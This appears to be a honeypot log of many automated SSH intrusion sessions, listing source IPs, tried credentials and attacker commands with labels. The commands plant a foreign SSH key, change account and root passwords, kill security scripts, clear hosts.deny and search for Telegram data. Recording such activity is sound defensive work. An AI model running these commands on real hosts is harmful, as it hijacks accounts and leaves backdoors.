$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "caleb\nR84OLSpRv6IN\nR84OLSpRv6IN"|passwd|bash
$ Enter new UNIX password:
$ echo "caleb\nR84OLSpRv6IN\nR84OLSpRv6IN\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_3 (46.62.225.25) β€” Helsinki, Finland Β· 1 session Β· 1 cmd
2026-06-08 14:18 EDT Β· as jimster/jimster2023$
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 blitz_root_5 (139.162.143.196) β€” Frankfurt am Main, Germany Β· 1 session Β· 1 cmd
2026-06-08 13:52 EDT Β· as root/jimster1.
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 bistro_root_2 (62.171.184.24) β€” Lauterbourg, France Β· 1 session Β· 1 cmd
2026-06-08 13:16 EDT Β· as root/jimster#1234
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 ghost_root_37 (45.114.125.24) β€” Hong Kong, Hong Kong Β· 1 session Β· 1 cmd
2026-06-08 12:15 EDT Β· as root/jimster#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 baguette_root_5 (178.238.226.170) β€” Lauterbourg, France Β· 1 session Β· 1 cmd
2026-06-08 11:59 EDT Β· as root/jimster1#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 phantom_root_28 (134.112.56.47) β€” Warsaw, Poland Β· 1 session Β· 20 cmds
2026-06-08 11:17 EDT Β· as oracle/Oracle@2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Oracle@2025\nr6SQJM4cqNsk\nr6SQJM4cqNsk"|passwd|bash
$ Enter new UNIX password:
$ echo "Oracle@2025\nr6SQJM4cqNsk\nr6SQJM4cqNsk\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 samba_root_2 (177.36.214.46) β€” Pirapora, Brazil Β· 1 session Β· 20 cmds
2026-06-08 11:00 EDT Β· as main/main123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "main123\nW5obe6ed8QR2\nW5obe6ed8QR2"|passwd|bash
$ Enter new UNIX password:
$ echo "main123\nW5obe6ed8QR2\nW5obe6ed8QR2\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 stein_root_11 (164.92.198.75) β€” Frankfurt am Main, Germany Β· 1 session Β· 1 cmd
2026-06-08 10:48 EDT Β· as root/jimster2024!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 lotus_root_6 (20.193.250.198) β€” Pune, India Β· 1 session Β· 1 cmd
2026-06-08 09:57 EDT Β· as jimster/jimster#2024
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 silk (116.25.93.50) β€” Shenzhen, China Β· 1 session Β· 1 cmd
2026-06-08 08:42 EDT Β· as jimster/jimster.123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 ghost_root_38 (152.200.181.42) β€” BelΓ©n, Colombia Β· 1 session Β· 19 cmds
2026-06-08 08:42 EDT Β· as root/adminit
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:KwHn7qi11cMx"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_4 (31.57.33.89) β€” Istanbul, TΓΌrkiye Β· 1 session Β· 20 cmds
2026-06-08 08:20 EDT Β· as hc/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nv43EIx6sojn0\nv43EIx6sojn0"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nv43EIx6sojn0\nv43EIx6sojn0\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 gouda_root_5 (152.42.138.167) β€” Amsterdam, Netherlands Β· 1 session Β· 1 cmd
2026-06-08 07:41 EDT Β· as root/jimster1@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 eagle_root_18 (138.2.235.174) β€” San Jose, United States Β· 1 session Β· 1 cmd
2026-06-08 07:23 EDT Β· as root/jimster2024!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 shadow_root_28 (2.192.136.250) β€” Milan, Italy Β· 1 session Β· 9 cmds
2026-06-08 06:00 EDT Β· as root/root
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ /ip cloud print
$ ifconfig // network mapping
$ uname -a // OS/kernel identification
$ cat /proc/cpuinfo // CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
🎭 meatball_root (188.151.176.48) β€” Lund, Sweden Β· 1 session Β· 9 cmds
2026-06-08 05:34 EDT Β· as root/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ /ip cloud print
$ ifconfig // network mapping
$ uname -a // OS/kernel identification
$ cat /proc/cpuinfo // CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
🎭 phantom_root_29 (163.7.9.84) β€” Banguntapan, Indonesia Β· 3 sessions Β· 59 cmds
2026-05-27 21:17 EDT Β· as admin/fjbdfdjkdsfs541544, odoo17/12345, root/Unicorn123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:tVzHLDy4CXhQ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "12345\nDSbMd0SHxoV1\nDSbMd0SHxoV1"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "12345\nDSbMd0SHxoV1\nDSbMd0SHxoV1\n"|passwd
$ echo -e "fjbdfdjkdsfs541544\nhxR03aPKpOkT\nhxR03aPKpOkT"|passwd|bash
$ echo "fjbdfdjkdsfs541544\nhxR03aPKpOkT\nhxR03aPKpOkT\n"|passwd
🎭 specter_3 (148.230.102.84) β€” Jakarta, Indonesia Β· 1 session Β· 1 cmd
2026-06-08 04:53 EDT Β· as jimster/jimster2023@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 ghost_root_39 (163.7.4.169) β€” Banguntapan, Indonesia Β· 1 session Β· 19 cmds
2026-06-08 04:50 EDT Β· as root/Unicorn123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Es6kUZV1qwcy"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_4 (217.15.164.43) β€” Singapore, Singapore Β· 1 session Β· 1 cmd
2026-06-08 03:44 EDT Β· as jimster/jimster1!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 silk_root_7 (182.43.71.198) β€” Jinan, China Β· 1 session Β· 1 cmd
2026-06-08 03:39 EDT Β· as root/Test@2022
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 ghost_root_40 (116.118.44.131) β€” Hanoi, Vietnam Β· 2 sessions Β· 39 cmds
2026-05-23 08:53 EDT Β· as root/dktkekf#$, zhangwei/zhangwei
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "zhangwei\nwern4xFEep9d\nwern4xFEep9d"|passwd|bash
$ Enter new UNIX password:
$ echo "zhangwei\nwern4xFEep9d\nwern4xFEep9d\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:ctul6pffKjFc"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 liberty_pi (107.175.114.16) β€” Buffalo, United States Β· 1 session Β· 20 cmds
2026-06-08 02:55 EDT Β· as gss/gss123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "gss123\n4URZ3CMnxNPi\n4URZ3CMnxNPi"|passwd|bash
$ Enter new UNIX password:
$ echo "gss123\n4URZ3CMnxNPi\n4URZ3CMnxNPi\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_29 (129.205.2.18) β€” Kampala, Uganda Β· 1 session Β· 20 cmds
2026-06-08 02:50 EDT Β· as zhangwei/zhangwei
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "zhangwei\nLRSh1MHMzIM7\nLRSh1MHMzIM7"|passwd|bash
$ Enter new UNIX password:
$ echo "zhangwei\nLRSh1MHMzIM7\nLRSh1MHMzIM7\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 capoeira_root_3 (187.45.95.66) β€” RiachΓ£o do Bacamarte, Brazil Β· 1 session Β· 20 cmds
2026-06-08 02:45 EDT Β· as apexuser/apexuser
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "apexuser\nKUL2MsPxLxRD\nKUL2MsPxLxRD"|passwd|bash
$ Enter new UNIX password:
$ echo "apexuser\nKUL2MsPxLxRD\nKUL2MsPxLxRD\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_41 (116.118.9.158) β€” Hanoi, Vietnam Β· 1 session Β· 1 cmd
2026-06-08 02:36 EDT Β· as root/jimster2024@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 bike_root (45.153.34.235) β€” Eygelshoven, Netherlands Β· 2 sessions Β· 2 cmds
2026-06-06 08:11 EDT Β· as root/147258, root/ubuntu
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—2
🎭 ghost_root_42 (103.133.56.8) β€” Jakarta, Indonesia Β· 1 session Β· 1 cmd
2026-06-08 01:57 EDT Β· as root/jimster2025#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 specter_root_28 (79.108.218.58) β€” Dich Vong, Vietnam Β· 1 session Β· 1 cmd
2026-06-08 01:21 EDT Β· as root/jimster1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 cowboy_root_18 (147.182.183.153) β€” North Bergen, United States Β· 2 sessions Β· 39 cmds
2026-05-30 05:34 EDT Β· as dev/dev12345, root/gfhjkm
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "dev12345\ngiBd235TowPx\ngiBd235TowPx"|passwd|bash
